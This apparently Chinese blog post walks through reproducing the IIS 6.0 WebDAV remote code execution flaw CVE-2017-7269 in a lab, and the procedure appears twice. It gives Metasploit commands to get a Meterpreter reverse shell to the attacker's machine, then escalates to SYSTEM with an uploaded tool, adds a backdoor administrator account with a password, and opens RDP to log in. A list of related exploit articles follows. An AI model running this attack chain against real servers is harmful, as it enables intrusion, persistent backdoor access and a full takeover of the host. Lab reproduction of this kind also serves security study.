iis6.0远程代码执行漏洞复现(CVE-2017-7269)
2018-01-22 14:25
3519 查看
一.实验环境搭建
1.目标机:windows server 2003 r2
2.iis配置
目标机ip:192.168.1.175
二.攻击机器
一台kai liunx
ip:192.168.1.144
三.开始攻击了
exp:https://github.com/zcgonvh/cve-2017-7269
1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
2.打开神器Metasploit
3.输入use命令,use exploit/windows/iis/cve-2017-7269
4.使用命令show options
5.设置目标机ip,set RHOST 192.168.1.175
6.设置对面网站,set HttpHost 192.168.1.175
7.设置返回载荷,set payload windows/meterpreter/reverse_tcp
8.设置攻击机ip,set LHOST 192.168.1.144
9.进行溢出,exploit
10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照
11.输入shell命令,来到了我们所熟悉的界面
12.查看当前用户权限,whoami,发现只是个一般用户权限
13.cd到网站目录,命令:c:\Inetpub\wwwroot,但是小编这里是没有权限进行创建文件,文件夹等操作的
14.来到c盘根目录,cd c:\,进行新建文件夹,发现创建成功(实际情况中就只有一个文件夹一个文件夹的寻找了)
14.按Ctrl + C退出shell,输出y
15.利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)
16.又回到shell里面确定工具上传是否成功
17.利用工具进行提权,命令:iis6.exe "whoami",已经是system权限了
18.进行新建用户,iis6.exe "net user DarkHQ !@#qwe123 /add"
19.添加用户到管理员,iis6.exe "net localhost administrators DarkHQ /add"
20.查看远程连接是否打开,没有打开,命令:netstat -an
21.再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)
命令:iis6.exe "3389.bat"
22.查看是否打开,netstat -an,已经成功打开
23.进行远程连接,本地cmd输入命令:mstsc
24.利用之前新建的管理员成功登录
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
1.目标机:windows server 2003 r2
2.iis配置
目标机ip:192.168.1.175
二.攻击机器
一台kai liunx
ip:192.168.1.144
三.开始攻击了
exp:https://github.com/zcgonvh/cve-2017-7269
1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
2.打开神器Metasploit
3.输入use命令,use exploit/windows/iis/cve-2017-7269
4.使用命令show options
5.设置目标机ip,set RHOST 192.168.1.175
6.设置对面网站,set HttpHost 192.168.1.175
7.设置返回载荷,set payload windows/meterpreter/reverse_tcp
8.设置攻击机ip,set LHOST 192.168.1.144
9.进行溢出,exploit
10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照
11.输入shell命令,来到了我们所熟悉的界面
12.查看当前用户权限,whoami,发现只是个一般用户权限
13.cd到网站目录,命令:c:\Inetpub\wwwroot,但是小编这里是没有权限进行创建文件,文件夹等操作的
14.来到c盘根目录,cd c:\,进行新建文件夹,发现创建成功(实际情况中就只有一个文件夹一个文件夹的寻找了)
14.按Ctrl + C退出shell,输出y
15.利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)
16.又回到shell里面确定工具上传是否成功
17.利用工具进行提权,命令:iis6.exe "whoami",已经是system权限了
18.进行新建用户,iis6.exe "net user DarkHQ !@#qwe123 /add"
19.添加用户到管理员,iis6.exe "net localhost administrators DarkHQ /add"
20.查看远程连接是否打开,没有打开,命令:netstat -an
21.再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)
命令:iis6.exe "3389.bat"
22.查看是否打开,netstat -an,已经成功打开
23.进行远程连接,本地cmd输入命令:mstsc
24.利用之前新建的管理员成功登录
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
相关文章推荐
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- IIS 6.0远程代码执行漏洞(CVE-2017-7269)
- CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
- Office CVE-2017-8570远程代码执行漏洞复现
- Office CVE-2017-8570远程代码执行漏洞复现
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- CVE-2017-8464 远程命令执行漏洞复现
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- Office CVE-2017-8570 远程代码执行漏洞复现
- 【漏洞公告】CVE-2017-8464 :Microsoft Windows LNK 远程代码执行漏洞
- CVE-2017-8464远程命令执行漏洞复现
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- CVE-2017-7269 IIS6.0利用MSF远程溢出漏洞提权
- Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
- 技术文章 | CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞分析报告
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
- Microsoft远程桌面协议RDP远程代码可执行漏洞(CVE-2012-0002)(MS12-020)